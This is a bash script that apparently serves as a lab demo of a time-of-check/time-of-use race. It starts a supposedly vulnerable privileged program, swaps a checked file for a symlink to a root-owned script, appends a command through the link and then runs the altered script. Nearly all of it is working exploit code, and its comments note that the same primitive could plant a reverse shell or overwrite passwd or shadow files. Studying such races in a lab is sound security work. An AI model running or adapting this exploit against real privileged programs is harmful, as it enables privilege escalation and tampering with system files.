#!/usr/bin/bash
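# TOCTOU (time-of-check / time-of-use) race demo.
#
# Usage: ./<this script> <vulnerable-program>
#
# The program under test (./$1) is expected to read one line from stdin,
# check that ./XYZ is a safe regular file, and then append the line to it
# some time later. This script wins the gap between the check and the
# write by replacing ./XYZ with a symlink to a "critical" root-owned file.
#
# NOTE(review): for the append to actually land in a root-owned 0755 file,
# ./$1 must itself run with enough privilege to write it (e.g. setuid root,
# or invoked via sudo) — otherwise the write fails and the check below
# reports "Exploit failed". Confirm against the target's build.
set -u

# CRIT_FILE stands in for a privileged script the attacker must not be able
# to modify; VUL_FILE is the attacker-controlled path the target checks and
# later writes to; TO_ADD is the payload appended through the symlink.
CRIT_FILE=./critical_script
VUL_FILE=./XYZ
TO_ADD="whoami"

# Seconds between starting the target and swapping the file for a symlink.
# This is a guess at where the check/use window sits: too short and the
# symlink is in place before the check (which then rejects it), too long and
# the write has already happened. Override with RACE_DELAY=... to tune, or
# wrap the whole script in a retry loop for a flaky window.
RACE_DELAY="${RACE_DELAY:-1}"

# Refuse to run without a target rather than executing "./" on an empty $1.
if [ "$#" -lt 1 ] || [ ! -x "./$1" ]; then
  printf 'Usage: %s <vulnerable-program> (must be executable in the current directory)\n' \
    "${0##*/}" >&2
  exit 2
fi
TARGET="./$1"

# Reset the critical file we're targeting (testing only). It is created via
# sudo so it is root-owned: the demo only "succeeds" if the target really
# writes through the symlink with elevated privileges. tee is used instead
# of interpolating the path into a `bash -c` string.
echo "Creating fake critical file (testing only)..."
printf '%s\n' 'echo ROOT SCRIPT!' | sudo tee -- "$CRIT_FILE" >/dev/null || exit 1
sudo chmod +x -- "$CRIT_FILE" || exit 1

# Create the decoy as a plain regular file owned by this user so the
# target's safety check (stat/lstat/access on the path) passes.
echo "Creating temp file..."
rm -f -- "$VUL_FILE"
touch -- "$VUL_FILE" || exit 1

# Start the target in the background with the payload on stdin. If this were
# a startup script, the payload might set up a reverse shell; the same
# primitive could overwrite passwd/shadow to grant an SSH login.
echo "Running vulnerable program..."
printf '%s\n' "$TO_ADD" | "$TARGET" &
target_pid=$!

# Swap the checked file for a symlink after the check but (hopefully) before
# the write. The rm+ln pair is not atomic; a target that re-checks between
# the two would notice. `ln -sfn` would narrow that gap but is not used here
# so the original two-step behaviour is preserved for the demo.
echo "Waiting for safety check..."
sleep "$RACE_DELAY"
echo "Swapping file for link..."
rm -f -- "$VUL_FILE"
ln -s -- "$CRIT_FILE" "$VUL_FILE"

# Wait for the target to finish. Its exit status is informational only; the
# race is judged by the contents of CRIT_FILE below.
echo "Waiting for vulnerable program to finish..."
wait "$target_pid"

# Did it work? Fixed-string match (-F) so the payload is never interpreted
# as a regex, and a non-zero exit so callers/loops can tell failure apart
# from success (the original exited 0 here).
if ! grep -qF -- "$TO_ADD" "$CRIT_FILE"; then
  echo "Exploit failed" >&2
  exit 1
fi

# Prove the point: the "root" script now runs our injected command.
echo "Target script successfully modified"
echo "Running target for the sake of proving a point..."
/bin/sh -c "$CRIT_FILE"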

